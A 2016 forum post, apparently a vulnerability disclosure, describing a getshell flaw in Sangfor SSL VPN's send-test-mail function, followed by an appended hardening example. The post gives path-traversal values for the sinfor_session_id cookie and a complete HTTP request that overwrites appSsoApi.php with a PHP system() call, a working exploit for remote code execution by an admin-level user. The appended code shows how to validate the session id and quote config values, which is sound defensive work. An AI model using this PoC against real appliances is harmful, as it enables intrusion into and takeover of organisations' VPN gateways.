HanDs
Administrator

[July vulnerability disclosure] Sangfor SSL VPN getshell vulnerability (preconditions apply)



Here is one.

Details:

To protect the vendor's intellectual property, most of the code is omitted here.

Preconditions for exploitation:

1. Permission to log in to the SSL VPN console

2. Permission to modify the mail server configuration in the SSL VPN



The problem is at line 147 of sysCfgController.class.php (the "send test mail" function of the mail server settings):

Code:
public function sendTestMail($SMTPServer, $SMTPPort, $DestAddr, $EmailTitle, $EnableCheckUsr=0, $EmailUser='', $EmailPassword='', $EmailFrom='', $LanguageType='zh_CN')
{
    // Write a temporary config file; the file name is taken straight from the cookie
    $conf_file = '/tmp/testmail_'.$_COOKIE['sinfor_session_id'];
    $contents = "[MAIL]\n";
    $contents .= "EnableEmailNotice = \"1\"\n";
    $contents .= "SMTPServer = \"$SMTPServer\"\n";
    $contents .= "SMTPPort = \"$SMTPPort\"\n";
    $contents .= "EnableCheckUsr = \"$EnableCheckUsr\"\n";
    $contents .= "EmailUser = \"$EmailUser\"\n";
    $contents .= "EmailPassword = \"$EmailPassword\"\n";
    $contents .= "EmailFrom = \"$EmailFrom\"\n";
    $contents .= "DestAddr = \"$DestAddr\"\n";
    $contents .= "EmailTitle = \"$EmailTitle\"\n";
    $contents .= "ContentsFile = \"/tmp/smtpsend_test.txt\"\n";
    @file_put_contents($conf_file, $contents);
    if (!file_exists($conf_file))
        throw new FileException($conf_file);
    // ... remainder of the function omitted by the author
}





file_put_contents is executed before the file_exists check, and $conf_file is built from the cookie parameter sinfor_session_id without any validation, so the file is written to whatever path the cookie names.

So when submitting the request, change the cookie sinfor_session_id to:

Code:
sinfor_session_id=W04EDB7D9DC3B2FAAD4A9DD6C23CE9B2/../../tmp/1.txt



This creates a file 1.txt in the /tmp/ directory.

How to get a shell? Just write a PHP file into the web root.

But there is a problem here: the newly created file has permissions -rw-------, meaning the web container cannot execute the new file.

To get around this, an existing PHP file has to be overwritten, so that its x permission is reused to get a shell.

Let's take this PHP file as the target: /app/usr/sbin/webui/html/appSsoApi.php

So change the cookie sinfor_session_id to:

Code:
sinfor_session_id=W04EDB7D9DC3B2FAAD4A9DD6C23CE9B2/../../tmp/../../app/usr/sbin/webui/html/appSsoApi.php



Note! This operation overwrites the PHP file above.



Final PoC:

Code:
POST /cgi-bin/php-cgi/html/delegatemodule/HttpHandler.php?controler=SysCfg&action=sendTestMail&token=72c791a93959bf388db3af864c09bbee82f2d1a8 HTTP/1.1
Accept: */*
Accept-Language: zh-CN
Referer: https://***/html/tpl/mailMgt.html
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: ***
Content-Length: 122
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: language=zh_CN; USER_CUSTOM_SETTING=1460011919; SESSID=C42EC5FBB05DCD23B13A3384C98E065DC8271CA9AC1B4F433557BC8C4FBC312; x-anti-csrf-gcs=72DFC30A00E3FB9E; sinfor_session_id=W04EDB7D9DC3B2FAAD4A9DD6C23CE9B2/../../tmp/../../app/usr/sbin/webui/html/appSsoApi.php; PHPSESSID=870a66816ba987171730e9b80753da82; x-act-flag-gcs=; usermrgstate=%7B%22params%22%3A%7B%22grpid%22%3A%2238%22%2C%22recflag%22%3A0%2C%22filter%22%3A0%7D%2C%22pageparams%22%3A%7B%22start%22%3A0%2C%22limit%22%3A25%7D%2C%22otherparams%22%3A%7B%22searchtype%22%3A0%2C%22recflag%22%3Afalse%7D%7D; hidecfg=%7B%22name%22%3Afalse%2C%22flag%22%3Afalse%2C%22note%22%3Afalse%2C%22expire%22%3Atrue%2C%22lastlogin_time%22%3Atrue%2C%22phone%22%3Atrue%2C%22allocateip%22%3Atrue%2C%22other%22%3Afalse%2C%22state%22%3Afalse%7D

SMTPServer=<?php system(id);?>&SMTPPort=1&EmailUser=&EmailPassword=&EmailFrom=1&LanguageType=zh_CN&DestAddr=1&EmailTitle=1





After submitting, visit https://***/cgi-bin/php-cgi/html/appSsoApi.php and the PHP code can be seen executing:

1.png

Proof of vulnerability:

1.png

Fix:

You know what to do.
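The post leaves the fix to the reader. The following is an added example, not Sangfor's code and not from the post, showing how the two weaknesses in the function at line 147 (the unvalidated sinfor_session_id used as a file name, and the raw interpolation of form fields into the INI text) can be closed. All names (safeSessionId, iniQuote, buildTestMailConf, sendTestMailHardened, InvalidSessionException) are placeholders; the allowed session-id character set is an assumption derived from the single sample value quoted in the post, and FileException is assumed to exist as in the original code.

```php
<?php
// Added example (not the vendor's code): a hardened version of the
// temporary-config-file logic from sendTestMail.

class FileException extends Exception {}           // assumed present in the original code base
class InvalidSessionException extends Exception {} // placeholder name for this example

/**
 * Accept the session id only if it is a plain alphanumeric token.
 * Assumption: the real ids look like "W04EDB7D9DC3B2FAAD4A9DD6C23CE9B2" (the
 * sample in the post). Slashes, "..", NUL bytes and anything else are rejected
 * before the value reaches any file system call, so it can never leave /tmp.
 */
function safeSessionId(?string $raw): string
{
    if ($raw === null || !preg_match('/\A[A-Za-z0-9]{16,64}\z/', $raw)) {
        throw new InvalidSessionException('malformed sinfor_session_id');
    }
    return $raw;
}

/**
 * Quote a value for the INI-style file. The original code dropped raw input
 * between double quotes, so a value containing a quote or a line break could
 * add keys of its own. Strip line breaks and NUL, escape quotes and backslashes.
 */
function iniQuote(string $value): string
{
    $value = str_replace(["\r", "\n", "\0"], '', $value);
    return '"' . addcslashes($value, '"\\') . '"';
}

/** Build the same [MAIL] section the original wrote, with every value quoted. */
function buildTestMailConf(array $p): string
{
    $keys = ['SMTPServer', 'SMTPPort', 'EnableCheckUsr', 'EmailUser',
             'EmailPassword', 'EmailFrom', 'DestAddr', 'EmailTitle'];
    $contents = "[MAIL]\nEnableEmailNotice = \"1\"\n";
    foreach ($keys as $k) {
        $contents .= $k . ' = ' . iniQuote((string)($p[$k] ?? '')) . "\n";
    }
    $contents .= "ContentsFile = \"/tmp/smtpsend_test.txt\"\n";
    return $contents;
}

/** Write the temp config under /tmp only; returns the path actually written. */
function sendTestMailHardened(array $p, string $rawSessionId): string
{
    $dir  = '/tmp';
    $conf = $dir . '/testmail_' . safeSessionId($rawSessionId);
    // Second, independent check: the resolved parent must still be $dir.
    if (dirname($conf) !== $dir) {
        throw new InvalidSessionException('refusing path outside ' . $dir);
    }
    if (file_put_contents($conf, buildTestMailConf($p), LOCK_EX) === false) {
        throw new FileException($conf);
    }
    chmod($conf, 0600); // same owner-only mode the post observed on the created file
    return $conf;
}

// Self-check using the two cookie values quoted in the post and one clean value.
function demo(): void
{
    $samples = [
        'W04EDB7D9DC3B2FAAD4A9DD6C23CE9B2',
        'W04EDB7D9DC3B2FAAD4A9DD6C23CE9B2/../../tmp/1.txt',
        'W04EDB7D9DC3B2FAAD4A9DD6C23CE9B2/../../tmp/../../app/usr/sbin/webui/html/appSsoApi.php',
    ];
    foreach ($samples as $id) {
        try {
            safeSessionId($id);
            echo "accepted: $id\n";
        } catch (InvalidSessionException $e) {
            echo "rejected: $id\n";
        }
    }
    // The PHP tag from the PoC body is now an inert quoted string inside /tmp.
    echo buildTestMailConf(['SMTPServer' => '<?php system(id);?>', 'SMTPPort' => '1']);
}
demo();
```

Reordering file_exists before file_put_contents would not have helped: the check only confirms that the write succeeded and says nothing about where it went. The fix is to refuse any session id that is not a bare token, and the dirname() check gives a second line of defence if the regex is ever relaxed. Quoting the INI values is secondary here, since a file under /tmp is not served by the web container, but it prevents the form fields from injecting extra configuration keys.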


#1
Posted: 2016-7-14   |   Views: 0   |   Replies: 0